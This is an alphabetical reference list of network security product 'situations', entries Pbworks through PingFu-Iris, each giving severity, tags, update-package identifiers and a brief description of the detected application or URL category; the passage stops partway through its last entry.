Description: PBworks is a system for real-time collaboration, which offers a rich editing software that allows users to collaborate over a publicly accessible workspace. Pbworks is accessible at http://www.pbworks.com.
Back to top

Pbxes

About this situation: Application Pbxes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: i-p-tel mission is development of new-age Apps and their integration with relevant web-based platforms, to provide end users with access to value added services.
Back to top

Pchintl

About this situation: Application Pchintl detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PCH provides custom manufacturing solutions for startups and Fortune 500 companies. Whether design engineering and development, manufacturing and fulfillment, distribution or retail, PCH takes on the toughest challenges. If it can be imagined, it can be made.
Back to top

PDF File

About this situation: PDF file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Document, Generic PDF Document
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Pdf2Jpg.net

About this situation: Application Pdf2Jpg.net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Convert PDF to JPG - PDF to JPG converter, nothing to download, no registration, no watermark.
Back to top

PDFenword

About this situation: Application PDFenword detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PDFenword allows convert PDF files to word file for free directly online without registration. It also provide software for convertation files.
Back to top

PDFescape

About this situation: Application PDFescape detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Edit PDF files with PDFescape is an online, PDF reader, PDF editor and PDF form filler.
Back to top

PDS-Energy

About this situation: Application PDS-Energy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PDS Energy provides technology to efficiently transfer information electronically and access, integrate and manage data. Services allow companies to enhance productivity by accelerating information flow, reducing cost, and delivering consistent, timely and complete information to their business partners.
Back to top

Peachtree

About this situation: Application Peachtree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Peachtree provide professional, helpful assistance to people looking to achieve their financial goals.
Back to top

Peacock

About this situation: Peacock usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1658-5242
Description: Peacock is an American over-the-top video streaming service. This application situation is meant only for blocking the application.
Back to top

Peak-Performance

About this situation: Application Peak-Performance detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Peak Performance is Premium Sporting Goods.
Back to top

Pearltrees

About this situation: Application Pearltrees detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pearltrees lets you organize, explore and share everything you like.
Back to top

Pearson-PowerSchool

About this situation: Application Pearson-PowerSchool detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pearson is focused on providing the solutions that can impact performance daily. Whether it's reporting, grading, scheduling or communicating, Pearson student information systems and performance solutions make schools and districts job easier and provide the information needed to make better, timelier decisions
Back to top

Peer-to-Peer File Sharing

About this situation: Sites that provide client software to enable peer-to-peer file sharing and transfer.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss, Productivity Loss, Security Risk, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide client software to enable peer-to-peer file sharing and transfer.
Back to top

PEER1

About this situation: Application PEER1 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PEER 1 Hosting's on-demand cloud storage offering: CloudOne Storage offers infinite scalability and no-maintenance storage at an extremely affordable price. Built on a utility-based pricing model, you turn our cloud storage on and off as you need it. And you only pay for what you use.
Back to top

Peer5

About this situation: Peer5 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Description: Peer5 is a CDN for video live streaming.
Back to top

Peerius

About this situation: Application Peerius detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Peerius is creator in website personalisation software solutions. It takes personalisation to a new level of sophistication, intuitively guiding your customers towards the products that they want to buy across multiple channels.
Back to top

Peerless-Data-Systems

About this situation: Application Peerless-Data-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Peerless Data Systems is a company that provides EDI solution for companies.
Back to top

Pega

About this situation: Application Pega detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pega - comprehensive software and applications that focus on customer service and predictive analytics.
Back to top

Pelotonics

About this situation: Pelotonics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: This application allows groups of users to plan and organize projects online.
Back to top

PennyBackup

About this situation: Application PennyBackup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PennyBackup provides cost-effective software and market-leading technology, unlimited remote data backup and recovery services.
Back to top

Pentaho

About this situation: Pentaho usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-636-5211
Description: Pentaho Business Analytics is a suite of Business Intelligence product that offers multiple services such as analysis, data mining, data integration, dashboarding, reporting and workflow capabilities.
Back to top

Penzu

About this situation: Application Penzu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Penzu is online diary and personal journal focused on privacy.
Back to top

People-Daily-Online

About this situation: People's Daily Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: People's Daily is a Chinese newspaper.
Back to top

Peoplefluent

About this situation: Application Peoplefluent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Peoplefluent is provider of human capital management solutions for the entire workforce, supporting over 5,100 organizations in 214 countries and territories.
Back to top

PeopleGoal

About this situation: Application PeopleGoal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PeopleGoal is a cloud-based employee performance management service.
Back to top

PeopleMatter

About this situation: Application PeopleMatter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PeopleMatter is a powerful and complete set of workforce solutions and business intelligence tools, built specifically to help service-industry brands thrive.
Back to top

PeopleNet

About this situation: Application PeopleNet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PeopleNet is focused on providing innovative Internet-based and integrated onboard computing and mobile communications systems to improve North America's trucking industry's fleet management.
Back to top

PeoplePerHour

About this situation: Application PeoplePerHour detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PeoplePerHour.com is a marketplace connecting small businesses and freelancers all over the world in a trusted environment where they buy and sell services to each other.
Back to top

PeopleTree

About this situation: Application PeopleTree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PeopleTree provides scalable management software solutions to companies.
Back to top

Peoplexs

About this situation: Application Peoplexs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Peoplexs- is a SAAS provider of recruitment, education and talent management software. With a passion for HR, recruitment and talent management.
Back to top

Pepperjam-Network

About this situation: Application Pepperjam-Network detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pepperjam Network offers online omni-channel performance marketing and technology solutions to advertisers.
Back to top

Peps

About this situation: Peps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese social networking service that allows users to read and write blogs, download audio and video files, and chat with friends.
Back to top

Pepsi-Pulse

About this situation: Pepsi Pulse usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-629-5211
Description: Pepsi Pules is an interactive, social media driven platform for music, sports and entertainment.
Back to top

Percussion

About this situation: Application Percussion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Percussion Software's web content management system is used by higher education, government agencies, and business organizations - SMB to Enterprise.
Back to top

PerfectCloud

About this situation: Application PerfectCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PerfectCloud products enhance Enterprise Data Security and Privacy for organizations utilizing cloud computing and Bring Your Own Devic e(BYOD).
Back to top

Perfectforms

About this situation: Application Perfectforms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PerfectForms is a web-based application development platform that enables both IT professionals and business users to create workflow applications without writing any code.
Back to top

Perfecto-Mobile

About this situation: Application Perfecto-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Perfecto Mobile offer a hybrid cloud-based mobile testing environment, The Continuous Quality Lab
Back to top

Perforce

About this situation: Application Perforce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Perforce offers the industry's version management and collaboration platform. Perforce protects its customers IP and enables teams to collaborate without conflict on from source code to industrial designs to business documents.
Back to top

Performance-Culture

About this situation: Application Performance-Culture detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Performance Culture is a web-based performance management system that utilizes the performance values matrix for employee coaching.
Back to top

PerformanceCanvas

About this situation: Application PerformanceCanvas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Performance Canvas powered by DSPanel offers cutting edge technology platform for financial reporting, planning, budgeting, and consolidating.
Back to top

Permit-Vision

About this situation: Application Permit-Vision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Permit Vision is an electronic permit to work system with integrated task risk assessment and logout
Back to top

PersistentSystem

About this situation: Application PersistentSystem detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PersistentSystem builds software that drives customers business, for enterprises and software product companies with software at the core of digital transformation.
Back to top

Persistent_CRL_Cache-Error

About this situation: Persistent CRL Cache Error
Context: Engine situations
Severity: 5
Tags: NGFW
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Description: Error from Persistent CRL Cache
Back to top

Persistent_CRL_Cache-Event

About this situation: Persistent CRL Cache Event
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Description: Informative Event from Persistent CRL Cache
Back to top

Personal Network Storage and Backup

About this situation: Sites that store personal files on web servers for backup or exchange.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that store personal files on web servers for backup or exchange.
Back to top

Personal-Capital

About this situation: Application Personal-Capital detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Personal Capital provides financial technology for gather and analyze financial data, with a financial advisor.
Back to top

Personals and Dating

About this situation: Sites that assist users in establishing interpersonal relationships, excluding those intended to arrange for sexual encounters.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that assist users in establishing interpersonal relationships, excluding those intended to arrange for sexual encounters.
Back to top

Personforce

About this situation: Application Personforce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Personforce helps publishers make money from job boards and tech employers connect with top talent. Search tech jobs, hire technology talent, or use Personforce job board software on your site.
Back to top

Personyze

About this situation: Application Personyze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Personyze offers advanced SaaS platform in the market for real-time visitor segmentation and site personalization.
Back to top

Perspecsys

About this situation: Application Perspecsys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Perspecsys is a cloud data protection platform solves data compliance, privacy and security concerns for enterprises adopting cloud-based applications.
Back to top

Perspectives360

About this situation: Application Perspectives360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Perspectives 360 provides time-efficient multi-rater system, assessment reports, assessment tool, report that includes practical suggestions to improve performance, and flexible 360 degree appraisal system.
Back to top

Pertino

About this situation: Pertino usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Pertino is a cloud networking platform solution that leverages cloud infrastructure, next generation network virtualization, and software-defined networking to dramatically simplify networking without sacrificing enterprise-level functionality. Source: Wikipedia
Back to top

Pervasive

About this situation: Application Pervasive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pervasive Software - embeddable data management products deliver integration between corporate data, third-party applications and custom software.
Back to top

PGi

About this situation: Application PGi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PGi is a collaboration and web meeting technology. See how iMeet, GlobalMeet, or GlobalMeet Audio gives you a Collaborative Advantage.
Back to top

Phabricator

About this situation: Application Phabricator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Phabricator is a suite of open source tools for peer code review, task management, and project communication.
Back to top

Pharmacy-OneSource

About this situation: Application Pharmacy-OneSource detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pharmacy OneSource helps clinical leaders achieve their goals to improve patient safety, clinical outcomes, compliance and financial performance.
Back to top

Pharmatechnik

About this situation: Application Pharmatechnik detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pharmatechnik developes pharmacy software IT solutions for pharmacies and dental and medical practices.
Back to top

PHAWorks

About this situation: Application PHAWorks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PHAWorks conducts process hazard analysis studies such as HAZOP, What-If, and FMEA to come into compliance with OSHA PSM and EPA RMP.
Back to top

PHC-FX

About this situation: Application PHC-FX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PHC FX is an online business solution. Provides ability to Control Leads and Opportunities, create invoices according to your needs, dialogue Time Control, deduct Tax Automatically and other
Back to top

Phishing and Other Frauds

About this situation: Sites that counterfeit legitimate sites to elicit financial or other private information from users.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that counterfeit legitimate sites to elicit financial or other private information from users.
Back to top

PhishMe

About this situation: Application PhishMe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PhishMe is the provider of threat management for organizations concerned about human susceptibility to advanced targeted attacks. PhishMe concept based on experience in penetration testing, social engineering, abuse management, incident response and forensics.
Back to top

Phoenix

About this situation: Application Phoenix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Phoenix specialises in areas of technology, from managed hosting and cloud services to high speed applications and performance.
Back to top

Phone.com

About this situation: Application Phone.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Phone.com offers phone services for small business, entrepreneurs or personal use.
Back to top

Phonebooth

About this situation: Application Phonebooth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Phonebooth OnDemand is a hosted VoIP business phone system that gives small business owners the flexibility and convenience of a big business phone solution at a fraction of the price. Operating in the cloud, Phonebooth is a smarter way to do business VoIP. The Phonebooth software platform was designed with the small business owner in mind--it's easy to use, simple to customize and completely accessible online.
Back to top

PhoneBurner

About this situation: Application PhoneBurner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PhoneBurner is a cloud based power dialer software boosts productivity. Increases dials and live answers, improves workflow and lead engagement.
Back to top

Phonedeck

About this situation: Application Phonedeck detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Phonedeck is tech startup that develops solutions combining mobile communications and IT systems. Based on the Salesforce Platform the products are supporting sales and service reps in their daily work and are boosting their productivity.
Back to top

Photo.net

About this situation: Photo.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Photobook-Worldwide

About this situation: Application Photobook-Worldwide detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Photobook Worldwide is an ecommerce business that provides an experience in preserving meaningful memories through a fully customizable, premium printed photo album.
Back to top

Photobox

About this situation: Application Photobox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PhotoBox is an online photo storage, tha allows to upload, share photos and order digital prints.
Back to top

Photobucket

About this situation: Photobucket usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1238-5242
Description: Photobucket offers image hosting, free photo sharing and video sharing.
Back to top

Photobucket-Upload

About this situation: Photobucket upload detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-1238-5242
Description: Photobucket offers image hosting, free photo sharing and video sharing.
Back to top

PhotoFunia

About this situation: Application PhotoFunia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PhotoFunia is an online photo editing tool.
Back to top

PhotoPeach

About this situation: Application PhotoPeach detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PhotoPeach automatically makes your own slide show in seconds. Upload photos, pick music, add captions in the show.
Back to top

Photopost

About this situation: PhotoPost usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Photoshop

About this situation: Endpoint Context Agent based Photoshop
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Adobe Photoshop endpoint application has been detected.
Back to top

Photoshop.com

About this situation: Photoshop.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

phparchitect

About this situation: Application phparchitect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Php
Back to top

phpBB

About this situation: Application phpBB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: phpBB is free and open source forum software that is easy to use, powerful, and highly customisable. Our community offers extensive support to end users.
Back to top

phpMyAdmin

About this situation: Application phpMyAdmin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: phpMyAdmin is open source tool written in PHP intended to handle the administration of MySQL with the use of a web browser.
Back to top

PhraseApp

About this situation: Application PhraseApp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PhraseApp is a translation management solution for web and mobile applications.
Back to top

PHS-Software

About this situation: Application PHS-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PHS Software was developed to assist you to proactively manage your health and safety needs in the most simple, affordable and cost effective way possible.
Back to top

Piano-Media

About this situation: Application Piano-Media detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Piano is a SaaS company specializing in advanced media business processes and online commerce optimization software.
Back to top

Picfull

About this situation: Picfull usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: Allowes the user to edit pictures online.
Back to top

Pichat

About this situation: Pichat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-628-5211
Description: Pichat is a software to communicate and exchange information in a peer-to-peer network. It uses default port TCP/9009.
Back to top

PicMonkey

About this situation: Application PicMonkey detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PicMonkey offers basic editing all the way to touch-up and advanced effects with supafly graphics capabilities to boot.
Back to top

Picresize

About this situation: Application Picresize detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Picresize is cloud-based software that allows you to resize, shrink, and crop your pictures.
Back to top

Picturetrail

About this situation: Picturetrail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Pidgin

About this situation: Endpoint Context Agent based Pidgin
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Pidgin IM endpoint application has been detected.
Back to top

PIEmatrix

About this situation: Application PIEmatrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PIEmatrix is an online project results platform made for accelerating projects and processes to deliver better results.
Back to top

PieSync

About this situation: Application PieSync detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PieSync is easiest tool to improve the productivity of your sales and support teams by integrating Highrise into your Gmail. View all contact information from within any email, create new contacts quickly, add an email to a contact with a single click and even have your contacts and tasks synced with Google Contacts and Google Tasks.
Back to top

Pike-13

About this situation: Application Pike-13 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Front Desk mobile client management software is a powerful tool for you to run your business anywhere, anytime.
Back to top

PikPok-Flick-Kick-Football

About this situation: PikPok Flick Kick Football traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1638-5242
Description: Flick Kick Football is a mobile sport game.
Back to top

Piktochart

About this situation: Application Piktochart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Piktochart is an infographic design app to produce simple and high quality graphics.
Back to top

Pilgrimsoftware

About this situation: Application Pilgrimsoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pilgrim Quality Solutions is a provider of enterprise quality management software and services for the Life Sciences and other highly regulated industries.
Back to top

Pimcore

About this situation: Application Pimcore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pimcore is the open-source enterprise software platform for PIM, CMS, DAM and commerce.
Back to top

Pinboard

About this situation: Application Pinboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pinboard is a social bookmarking website developed and run by Maciej Ceglowski. It has a plain design and a focus on personal management of bookmarks using tags to organize them.
Back to top

Ping-Identity

About this situation: Application Ping-Identity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ping Identity delivers single sign-on and identity management with SAML SSO. It provides IT security and secure mobile access.
Back to top

Pingdom

About this situation: Pingdom usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1764-5242
Description: Pingdom: Pingdom is a service that tracks the uptime, downtime, and performance of websites.
Back to top

PingFu-Iris

About this situation: PingFu Iris usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-628-5211
